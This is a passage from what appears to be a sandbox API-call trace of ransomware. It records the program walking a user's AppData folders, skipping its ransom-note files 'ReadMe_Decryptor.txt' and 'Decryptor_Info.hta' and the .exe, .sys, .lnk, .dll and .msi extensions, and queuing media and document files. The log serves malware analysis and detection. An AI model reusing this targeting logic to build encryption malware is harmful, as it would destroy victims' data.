HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\" [0080.757] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\") returned 85 [0080.757] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a960 [0080.759] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.759] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.760] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.760] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.760] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.761] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0080.761] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.761] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0080.761] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d40bff0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.761] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.761] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0080.761] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0080.761] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0080.761] lstrlenW (lpString="Headlights") returned 10 [0080.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Headlights" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights" [0080.762] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\" [0080.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\") returned 63 [0080.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.765] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.765] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.768] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.768] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.768] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.768] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.768] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0080.768] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0080.768] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0080.768] lstrlenW (lpString="Linguistics") returned 11 [0080.769] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="Linguistics" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics" [0080.769] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" [0080.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0080.769] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.771] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.774] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.775] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0080.775] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0080.775] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0080.775] lstrlenW (lpString="Dictionaries") returned 12 [0080.775] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="Dictionaries" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries" [0080.775] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" [0080.775] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0080.775] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0080.775] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.776] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.777] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.777] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0080.777] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.777] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.778] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0080.778] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0080.778] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0080.778] lstrlenW (lpString="LogTransport2") returned 13 [0080.778] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="LogTransport2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2" [0080.778] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0080.778] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0080.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.781] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.781] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.783] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.784] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.784] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.784] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.784] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.784] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0080.784] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x73bdb650, ftCreationTime.dwHighDateTime=0x1d5d84a, ftLastAccessTime.dwLowDateTime=0x9bf854a0, ftLastAccessTime.dwHighDateTime=0x1d5e6e5, ftLastWriteTime.dwLowDateTime=0x9bf854a0, ftLastWriteTime.dwHighDateTime=0x1d5e6e5, nFileSizeHigh=0x0, nFileSizeLow=0x12154, dwReserved0=0x0, dwReserved1=0x0, cFileName="AeF73GQFrRUFEfP_C.mkv", cAlternateFileName="AEF73G~1.MKV")) returned 1 [0080.784] lstrcmpW (lpString1="AeF73GQFrRUFEfP_C.mkv", lpString2=".") returned 1 [0080.784] lstrcmpW (lpString1="AeF73GQFrRUFEfP_C.mkv", lpString2="..") returned 1 [0080.784] lstrcmpiW (lpString1="AeF73GQFrRUFEfP_C.mkv", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.784] lstrcmpiW (lpString1="AeF73GQFrRUFEfP_C.mkv", lpString2="Decryptor_Info.hta") returned -1 [0080.784] PathFindExtensionW (pszPath="AeF73GQFrRUFEfP_C.mkv") returned=".mkv" [0080.784] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0080.784] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0080.785] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0080.785] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0080.785] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0080.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0080.785] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x76c368 [0080.785] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.785] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3951c6c0, ftCreationTime.dwHighDateTime=0x1d5d8f7, ftLastAccessTime.dwLowDateTime=0x213d62c0, ftLastAccessTime.dwHighDateTime=0x1d5dc16, ftLastWriteTime.dwLowDateTime=0x213d62c0, ftLastWriteTime.dwHighDateTime=0x1d5dc16, nFileSizeHigh=0x0, nFileSizeLow=0xe63f, dwReserved0=0x0, dwReserved1=0x0, cFileName="C8yKV.rtf", cAlternateFileName="")) returned 1 [0080.785] lstrcmpW (lpString1="C8yKV.rtf", lpString2=".") returned 1 [0080.785] lstrcmpW (lpString1="C8yKV.rtf", lpString2="..") returned 1 [0080.785] lstrcmpiW (lpString1="C8yKV.rtf", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.785] lstrcmpiW (lpString1="C8yKV.rtf", lpString2="Decryptor_Info.hta") returned -1 [0080.786] PathFindExtensionW (pszPath="C8yKV.rtf") returned=".rtf" [0080.786] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0080.786] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0080.786] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0080.786] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0080.786] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0080.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x76c400 [0080.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.786] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcee75d90, ftCreationTime.dwHighDateTime=0x1d5dc3e, ftLastAccessTime.dwLowDateTime=0xfaecc060, ftLastAccessTime.dwHighDateTime=0x1d5e021, ftLastWriteTime.dwLowDateTime=0xfaecc060, ftLastWriteTime.dwHighDateTime=0x1d5e021, nFileSizeHigh=0x0, nFileSizeLow=0x14b51, dwReserved0=0x0, dwReserved1=0x0, cFileName="CgDtuQ2FH3A.ppt", cAlternateFileName="CGDTUQ~1.PPT")) returned 1 [0080.786] lstrcmpW (lpString1="CgDtuQ2FH3A.ppt", lpString2=".") returned 1 [0080.786] lstrcmpW (lpString1="CgDtuQ2FH3A.ppt", lpString2="..") returned 1 [0080.786] lstrcmpiW (lpString1="CgDtuQ2FH3A.ppt", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.786] lstrcmpiW (lpString1="CgDtuQ2FH3A.ppt", lpString2="Decryptor_Info.hta") returned -1 [0080.786] PathFindExtensionW (pszPath="CgDtuQ2FH3A.ppt") returned=".ppt" [0080.787] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0080.787] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0080.787] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0080.787] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0080.787] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0080.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.787] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x76c478 [0080.787] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.787] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0a6be80, ftCreationTime.dwHighDateTime=0x1d5db94, ftLastAccessTime.dwLowDateTime=0x59262a00, ftLastAccessTime.dwHighDateTime=0x1d5dec3, ftLastWriteTime.dwLowDateTime=0x59262a00, ftLastWriteTime.dwHighDateTime=0x1d5dec3, nFileSizeHigh=0x0, nFileSizeLow=0x4b91, dwReserved0=0x0, dwReserved1=0x0, cFileName="EpNbVP.avi", cAlternateFileName="")) returned 1 [0080.787] lstrcmpW (lpString1="EpNbVP.avi", lpString2=".") returned 1 [0080.787] lstrcmpW (lpString1="EpNbVP.avi", lpString2="..") returned 1 [0080.787] lstrcmpiW (lpString1="EpNbVP.avi", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.787] lstrcmpiW (lpString1="EpNbVP.avi", lpString2="Decryptor_Info.hta") returned 1 [0080.787] PathFindExtensionW (pszPath="EpNbVP.avi") returned=".avi" [0080.787] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0080.787] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0080.788] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0080.788] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0080.788] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0080.788] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.788] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.788] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.788] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x76c500 [0080.788] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.788] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8ed6c220, ftCreationTime.dwHighDateTime=0x1d5e08c, ftLastAccessTime.dwLowDateTime=0x38af59a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d6, ftLastWriteTime.dwLowDateTime=0x38af59a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d6, nFileSizeHigh=0x0, nFileSizeLow=0xd896, dwReserved0=0x0, dwReserved1=0x0, cFileName="fGEdHmol-uYJ2aUx41b.m4a", cAlternateFileName="FGEDHM~1.M4A")) returned 1 [0080.788] lstrcmpW (lpString1="fGEdHmol-uYJ2aUx41b.m4a", lpString2=".") returned 1 [0080.788] lstrcmpW (lpString1="fGEdHmol-uYJ2aUx41b.m4a", lpString2="..") returned 1 [0080.788] lstrcmpiW (lpString1="fGEdHmol-uYJ2aUx41b.m4a", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.788] lstrcmpiW (lpString1="fGEdHmol-uYJ2aUx41b.m4a", lpString2="Decryptor_Info.hta") returned 1 [0080.788] PathFindExtensionW (pszPath="fGEdHmol-uYJ2aUx41b.m4a") returned=".m4a" [0080.788] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0080.788] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0080.788] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0080.788] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0080.788] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0080.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0080.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.789] 